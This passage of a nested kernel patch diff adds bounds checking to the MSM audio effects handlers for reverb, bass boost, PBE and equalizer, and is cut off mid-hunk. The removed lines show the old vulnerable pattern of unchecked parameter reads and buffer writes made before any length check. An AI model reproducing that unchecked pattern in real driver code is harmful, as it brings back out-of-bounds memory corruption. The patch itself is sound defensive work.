- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ REVERB_GAIN_ADJUST_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_GAIN_ADJUST", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
- AUDPROC_PARAM_ID_REVERB_GAIN_ADJUST;
-- *updt_params++ = REVERB_GAIN_ADJUST_PARAM_SZ;
-- *updt_params++ = reverb->gain_adjust;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- REVERB_GAIN_ADJUST_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->gain_adjust;
- }
- break;
- case REVERB_ROOM_LEVEL:
-@@ -357,17 +468,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->room_level = *values++;
-+ reverb->room_level =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_ROOM_LEVEL val:%d\n",
- __func__, reverb->room_level);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ REVERB_ROOM_LEVEL_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_ROOM_LEVEL", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
- AUDPROC_PARAM_ID_REVERB_ROOM_LEVEL;
-- *updt_params++ = REVERB_ROOM_LEVEL_PARAM_SZ;
-- *updt_params++ = reverb->room_level;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- REVERB_ROOM_LEVEL_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->room_level;
- }
- break;
- case REVERB_ROOM_HF_LEVEL:
-@@ -376,17 +496,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->room_hf_level = *values++;
-+ reverb->room_hf_level =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_ROOM_HF_LEVEL val%d\n",
- __func__, reverb->room_hf_level);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ REVERB_ROOM_HF_LEVEL_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_ROOM_HF_LEVEL", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
- AUDPROC_PARAM_ID_REVERB_ROOM_HF_LEVEL;
-- *updt_params++ = REVERB_ROOM_HF_LEVEL_PARAM_SZ;
-- *updt_params++ = reverb->room_hf_level;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- REVERB_ROOM_HF_LEVEL_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->room_hf_level;
- }
- break;
- case REVERB_DECAY_TIME:
-@@ -395,17 +524,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->decay_time = *values++;
-+ reverb->decay_time =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_DECAY_TIME val:%d\n",
- __func__, reverb->decay_time);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ REVERB_DECAY_TIME_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_DECAY_TIME", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
- AUDPROC_PARAM_ID_REVERB_DECAY_TIME;
-- *updt_params++ = REVERB_DECAY_TIME_PARAM_SZ;
-- *updt_params++ = reverb->decay_time;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- REVERB_DECAY_TIME_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->decay_time;
- }
- break;
- case REVERB_DECAY_HF_RATIO:
-@@ -414,17 +552,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->decay_hf_ratio = *values++;
-+ reverb->decay_hf_ratio =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_DECAY_HF_RATIO val%d\n",
- __func__, reverb->decay_hf_ratio);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ REVERB_DECAY_HF_RATIO_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_DECAY_HF_RATIO", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
- AUDPROC_PARAM_ID_REVERB_DECAY_HF_RATIO;
-- *updt_params++ = REVERB_DECAY_HF_RATIO_PARAM_SZ;
-- *updt_params++ = reverb->decay_hf_ratio;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- REVERB_DECAY_HF_RATIO_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->decay_hf_ratio;
- }
- break;
- case REVERB_REFLECTIONS_LEVEL:
-@@ -433,18 +580,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->reflections_level = *values++;
-+ reverb->reflections_level =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_REFLECTIONS_LEVEL val:%d\n",
- __func__, reverb->reflections_level);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-- *updt_params++ =
-- AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL;
-- *updt_params++ =
-- REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
-- *updt_params++ = reverb->reflections_level;
- params_length += COMMAND_PAYLOAD_SZ +
- REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_REFLECTIONS_LEVEL", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL;
-+ *updt_params++ =
-+ REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->reflections_level;
- }
- break;
- case REVERB_REFLECTIONS_DELAY:
-@@ -453,18 +608,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->reflections_delay = *values++;
-+ reverb->reflections_delay =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_REFLECTIONS_DELAY val:%d\n",
- __func__, reverb->reflections_delay);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-- *updt_params++ =
-- AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY;
-- *updt_params++ =
-- REVERB_REFLECTIONS_DELAY_PARAM_SZ;
-- *updt_params++ = reverb->reflections_delay;
- params_length += COMMAND_PAYLOAD_SZ +
- REVERB_REFLECTIONS_DELAY_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_REFLECTIONS_DELAY", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY;
-+ *updt_params++ =
-+ REVERB_REFLECTIONS_DELAY_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->reflections_delay;
- }
- break;
- case REVERB_LEVEL:
-@@ -473,16 +636,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->level = *values++;
-+ reverb->level =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_LEVEL val:%d\n",
- __func__, reverb->level);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-- *updt_params++ = AUDPROC_PARAM_ID_REVERB_LEVEL;
-- *updt_params++ = REVERB_LEVEL_PARAM_SZ;
-- *updt_params++ = reverb->level;
- params_length += COMMAND_PAYLOAD_SZ +
- REVERB_LEVEL_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_LEVEL", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_REVERB_LEVEL;
-+ *updt_params++ =
-+ REVERB_LEVEL_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->level;
- }
- break;
- case REVERB_DELAY:
-@@ -491,16 +664,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->delay = *values++;
-+ reverb->delay =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s:REVERB_DELAY val:%d\n",
- __func__, reverb->delay);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-- *updt_params++ = AUDPROC_PARAM_ID_REVERB_DELAY;
-- *updt_params++ = REVERB_DELAY_PARAM_SZ;
-- *updt_params++ = reverb->delay;
- params_length += COMMAND_PAYLOAD_SZ +
- REVERB_DELAY_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_DELAY", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
-+ *updt_params++ =
-+ 
AUDPROC_PARAM_ID_REVERB_DELAY;
-+ *updt_params++ =
-+ REVERB_DELAY_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->delay;
- }
- break;
- case REVERB_DIFFUSION:
-@@ -509,17 +692,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->diffusion = *values++;
-+ reverb->diffusion =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_DIFFUSION val:%d\n",
- __func__, reverb->diffusion);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ REVERB_DIFFUSION_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_DIFFUSION", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
- AUDPROC_PARAM_ID_REVERB_DIFFUSION;
-- *updt_params++ = REVERB_DIFFUSION_PARAM_SZ;
-- *updt_params++ = reverb->diffusion;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- REVERB_DIFFUSION_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->diffusion;
- }
- break;
- case REVERB_DENSITY:
-@@ -528,17 +720,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- reverb->density = *values++;
-+ reverb->density =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: REVERB_DENSITY val:%d\n",
- __func__, reverb->density);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ REVERB_DENSITY_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "REVERB_DENSITY", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_REVERB;
- *updt_params++ =
- AUDPROC_PARAM_ID_REVERB_DENSITY;
-- *updt_params++ = REVERB_DENSITY_PARAM_SZ;
-- *updt_params++ = reverb->density;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- REVERB_DENSITY_PARAM_SZ;
-+ *updt_params++ =
-+ reverb->density;
- }
- break;
- default:
-@@ -546,7 +747,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- break;
- }
- }
-- if (params_length && !msm_dts_eagle_is_hpx_on())
-+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- q6asm_send_audio_effects_params(ac, params,
- params_length);
- else
-@@ -560,15 +761,16 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- struct bass_boost_params *bass_boost,
- long *values)
- {
-- int devices = *values++;
-- int num_commands = *values++;
-- char *params;
-+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+ char *params = NULL;
-+ int rc = 0;
-+ int devices = GET_NEXT(values, param_max_offset, rc);
-+ int num_commands = GET_NEXT(values, param_max_offset, rc);
- int *updt_params, i, prev_enable_flag;
- uint32_t params_length = (MAX_INBAND_PARAM_SZ);
-- int rc = 0;
- 
- pr_debug("%s\n", __func__);
-- if (!ac) {
-+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- pr_err("%s: cannot set audio effects\n", __func__);
- return -EINVAL;
- }
-@@ -581,10 +783,14 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- updt_params = (int *)params;
- params_length = 0;
- for (i = 0; i < num_commands; i++) {
-- uint32_t command_id = *values++;
-- uint32_t command_config_state = *values++;
-- uint32_t index_offset = *values++;
-- uint32_t length = *values++;
-+ uint32_t command_id =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t command_config_state =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t index_offset =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t length =
-+ GET_NEXT(values, param_max_offset, rc);
- switch (command_id) {
- case BASS_BOOST_ENABLE:
- if (length != 1 || index_offset != 0) {
-@@ -593,18 +799,27 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- goto invalid_config;
- }
- prev_enable_flag = bass_boost->enable_flag;
-- bass_boost->enable_flag = *values++;
-+ bass_boost->enable_flag =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: BASS_BOOST_ENABLE prev:%d new:%d\n",
- __func__, prev_enable_flag,
- bass_boost->enable_flag);
- if (prev_enable_flag != bass_boost->enable_flag) {
-- *updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ BASS_BOOST_ENABLE_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "BASS_BOOST_ENABLE", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_BASS_BOOST;
- *updt_params++ =
- AUDPROC_PARAM_ID_BASS_BOOST_ENABLE;
-- *updt_params++ = BASS_BOOST_ENABLE_PARAM_SZ;
-- *updt_params++ = bass_boost->enable_flag;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- BASS_BOOST_ENABLE_PARAM_SZ;
-+ *updt_params++ =
-+ bass_boost->enable_flag;
- }
- break;
- case BASS_BOOST_MODE:
-@@ -613,17 +828,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- bass_boost->mode = *values++;
-+ bass_boost->mode =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: BASS_BOOST_MODE val:%d\n",
- __func__, bass_boost->mode);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ BASS_BOOST_MODE_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "BASS_BOOST_MODE", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_BASS_BOOST;
- *updt_params++ =
- AUDPROC_PARAM_ID_BASS_BOOST_MODE;
-- *updt_params++ = BASS_BOOST_MODE_PARAM_SZ;
-- *updt_params++ = bass_boost->mode;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- BASS_BOOST_MODE_PARAM_SZ;
-+ *updt_params++ =
-+ bass_boost->mode;
- }
- break;
- case BASS_BOOST_STRENGTH:
-@@ -632,17 +856,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- bass_boost->strength = *values++;
-- pr_debug("%s: BASS_BOOST_STRENGTHi val:%d\n",
-+ bass_boost->strength =
-+ GET_NEXT(values, param_max_offset, rc);
-+ pr_debug("%s: BASS_BOOST_STRENGTH val:%d\n",
- __func__, bass_boost->strength);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ BASS_BOOST_STRENGTH_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "BASS_BOOST_STRENGTH", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_BASS_BOOST;
- *updt_params++ =
- AUDPROC_PARAM_ID_BASS_BOOST_STRENGTH;
-- *updt_params++ = BASS_BOOST_STRENGTH_PARAM_SZ;
-- *updt_params++ = bass_boost->strength;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- BASS_BOOST_STRENGTH_PARAM_SZ;
-+ *updt_params++ =
-+ bass_boost->strength;
- }
- break;
- default:
-@@ -650,7 +883,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- break;
- }
- }
-- if (params_length && !msm_dts_eagle_is_hpx_on())
-+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- q6asm_send_audio_effects_params(ac, params,
- params_length);
- else
-@@ -664,15 +897,16 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- struct pbe_params *pbe,
- long *values)
- {
-- int devices = *values++;
-- int num_commands = *values++;
-- char *params;
-+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+ char *params = NULL;
-+ int rc = 0;
-+ int devices = GET_NEXT(values, param_max_offset, rc);
-+ int num_commands = GET_NEXT(values, param_max_offset, rc);
- int *updt_params, i, j, prev_enable_flag;
- uint32_t params_length = (MAX_INBAND_PARAM_SZ);
-- int rc = 0;
- 
- pr_debug("%s\n", __func__);
-- if (!ac) {
-+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- pr_err("%s: cannot set audio effects\n", __func__);
- return -EINVAL;
- }
-@@ -685,10 +919,14 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- updt_params = (int *)params;
- params_length = 0;
- for (i = 0; i < num_commands; i++) {
-- uint32_t command_id = *values++;
-- uint32_t command_config_state = *values++;
-- uint32_t index_offset = *values++;
-- uint32_t length = *values++;
-+ uint32_t command_id =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t command_config_state =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t index_offset =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t length =
-+ GET_NEXT(values, param_max_offset, rc);
- switch (command_id) {
- case PBE_ENABLE:
- pr_debug("%s: PBE_ENABLE\n", __func__);
-@@ -698,15 +936,24 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- goto invalid_config;
- }
- prev_enable_flag = pbe->enable_flag;
-- pbe->enable_flag = *values++;
-+ pbe->enable_flag =
-+ GET_NEXT(values, param_max_offset, rc);
- if (prev_enable_flag != pbe->enable_flag) {
-- *updt_params++ = AUDPROC_MODULE_ID_PBE;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ PBE_ENABLE_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "PBE_ENABLE", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_PBE;
- *updt_params++ =
- AUDPROC_PARAM_ID_PBE_ENABLE;
-- *updt_params++ = PBE_ENABLE_PARAM_SZ;
-- *updt_params++ = pbe->enable_flag;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- PBE_ENABLE_PARAM_SZ;
-+ *updt_params++ =
-+ pbe->enable_flag;
- }
- break;
- case PBE_CONFIG:
-@@ -719,15 +966,26 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- goto invalid_config;
- }
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_PBE;
-+ params_length += COMMAND_PAYLOAD_SZ + length;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "PBE_PARAM", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_PBE;
- *updt_params++ =
- AUDPROC_PARAM_ID_PBE_PARAM_CONFIG;
-- *updt_params++ = length;
-+ *updt_params++ =
-+ length;
- for (j = 0; j < length; ) {
- j += sizeof(*updt_params);
-- *updt_params++ = *values++;
-+ *updt_params++ =
-+ GET_NEXT(
-+ values,
-+ param_max_offset,
-+ rc);
- }
-- params_length += COMMAND_PAYLOAD_SZ + length;
- }
- break;
- default:
-@@ -735,7 +993,7 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- break;
- }
- }
-- if (params_length)
-+ if (params_length && (rc == 0))
- q6asm_send_audio_effects_params(ac, params,
- params_length);
- invalid_config:
-@@ -747,15 +1005,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- struct eq_params *eq,
- long *values)
- {
-- int devices = *values++;
-- int num_commands = *values++;
-- char *params;
-+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+ char *params = NULL;
-+ int rc = 0;
-+ int devices = GET_NEXT(values, param_max_offset, rc);
-+ int num_commands = GET_NEXT(values, param_max_offset, rc);
- int *updt_params, i, prev_enable_flag;
- uint32_t params_length = (MAX_INBAND_PARAM_SZ);
-- int rc = 0;
- 
- pr_debug("%s\n", __func__);
-- if (!ac) {
-+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- pr_err("%s: cannot set audio effects\n", __func__);
- return -EINVAL;
- }
-@@ -768,11 +1027,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- updt_params = (int *)params;
- params_length = 0;
- for (i = 0; i < num_commands; i++) {
-- uint32_t command_id = *values++;
-- uint32_t command_config_state = *values++;
-- uint32_t index_offset = *values++;
-- uint32_t length = *values++;
-- int idx, j;
-+ uint32_t command_id =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t command_config_state =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t index_offset =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t length =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t idx;
-+ int j;
- switch (command_id) {
- case EQ_ENABLE:
- if (length != 1 || index_offset != 0) {
-@@ -781,17 +1045,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- goto invalid_config;
- }
- prev_enable_flag = eq->enable_flag;
-- eq->enable_flag = *values++;
-+ eq->enable_flag =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: EQ_ENABLE prev:%d new:%d\n", __func__,
- prev_enable_flag, eq->enable_flag);
- if (prev_enable_flag != eq->enable_flag) {
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ EQ_ENABLE_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "EQ_ENABLE", rc);
-+ if (rc != 0)
-+ break;
- *updt_params++ =
- AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
-- *updt_params++ = AUDPROC_PARAM_ID_EQ_ENABLE;
-- *updt_params++ = EQ_ENABLE_PARAM_SZ;
-- *updt_params++ = eq->enable_flag;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_EQ_ENABLE;
-+ *updt_params++ =
- EQ_ENABLE_PARAM_SZ;
-+ *updt_params++ =
-+ eq->enable_flag;
- }
- break;
- case EQ_CONFIG:
-@@ -805,9 +1078,12 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- eq->config.eq_pregain, eq->config.preset_id);
- for (idx = 0; idx < MAX_EQ_BANDS; idx++)
- eq->per_band_cfg[idx].band_idx = -1;
-- eq->config.eq_pregain = *values++;
-- eq->config.preset_id = *values++;
-- eq->config.num_bands = *values++;
-+ eq->config.eq_pregain =
-+ GET_NEXT(values, param_max_offset, rc);
-+ eq->config.preset_id =
-+ GET_NEXT(values, param_max_offset, rc);
-+ eq->config.num_bands =
-+ GET_NEXT(values, param_max_offset, rc);
- if (eq->config.num_bands > MAX_EQ_BANDS) {
- pr_err("EQ_CONFIG:invalid num of bands\n");
- rc = -EINVAL;
-@@ -822,48 +1098,59 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- goto invalid_config;
- }
- for (j = 0; j < eq->config.num_bands; j++) {
-- idx = *values++;
-+ idx = GET_NEXT(values, param_max_offset, rc);
- if (idx >= MAX_EQ_BANDS) {
- pr_err("EQ_CONFIG:invalid band index\n");
- rc = -EINVAL;
- goto invalid_config;
- }
- eq->per_band_cfg[idx].band_idx = idx;
-- eq->per_band_cfg[idx].filter_type = *values++;
-+ eq->per_band_cfg[idx].filter_type =
-+ GET_NEXT(values, param_max_offset, rc);
- eq->per_band_cfg[idx].freq_millihertz =
-- *values++;
-+ GET_NEXT(values, param_max_offset, rc);
- 
eq->per_band_cfg[idx].gain_millibels = -- *values++; -+ GET_NEXT(values, param_max_offset, rc); - eq->per_band_cfg[idx].quality_factor = -- *values++; -+ GET_NEXT(values, param_max_offset, rc); - } - if (command_config_state == CONFIG_SET) { - int config_param_length = EQ_CONFIG_PARAM_SZ + - (EQ_CONFIG_PER_BAND_PARAM_SZ* - eq->config.num_bands); -+ params_length += COMMAND_PAYLOAD_SZ + -+ config_param_length; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_CONFIG", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; -- *updt_params++ = AUDPROC_PARAM_ID_EQ_CONFIG; -- *updt_params++ = config_param_length; -- *updt_params++ = eq->config.eq_pregain; -- *updt_params++ = eq->config.preset_id; -- *updt_params++ = eq->config.num_bands; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_EQ_CONFIG; -+ *updt_params++ = -+ config_param_length; -+ *updt_params++ = -+ eq->config.eq_pregain; -+ *updt_params++ = -+ eq->config.preset_id; -+ *updt_params++ = -+ eq->config.num_bands; - for (idx = 0; idx < MAX_EQ_BANDS; idx++) { - if (eq->per_band_cfg[idx].band_idx < 0) - continue; - *updt_params++ = -- eq->per_band_cfg[idx].filter_type; -+ eq->per_band_cfg[idx].filter_type; - *updt_params++ = -- eq->per_band_cfg[idx].freq_millihertz; -+ eq->per_band_cfg[idx].freq_millihertz; - *updt_params++ = -- eq->per_band_cfg[idx].gain_millibels; -+ eq->per_band_cfg[idx].gain_millibels; - *updt_params++ = -- eq->per_band_cfg[idx].quality_factor; -+ eq->per_band_cfg[idx].quality_factor; - *updt_params++ = -- eq->per_band_cfg[idx].band_idx; -+ eq->per_band_cfg[idx].band_idx; - } -- params_length += COMMAND_PAYLOAD_SZ + -- config_param_length; - } - break; - case EQ_BAND_INDEX: -@@ -872,7 +1159,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- idx = *values++; -+ idx = GET_NEXT(values, param_max_offset, rc); - if (idx > MAX_EQ_BANDS) { - pr_err("EQ_BAND_INDEX:invalid band index\n"); - rc = 
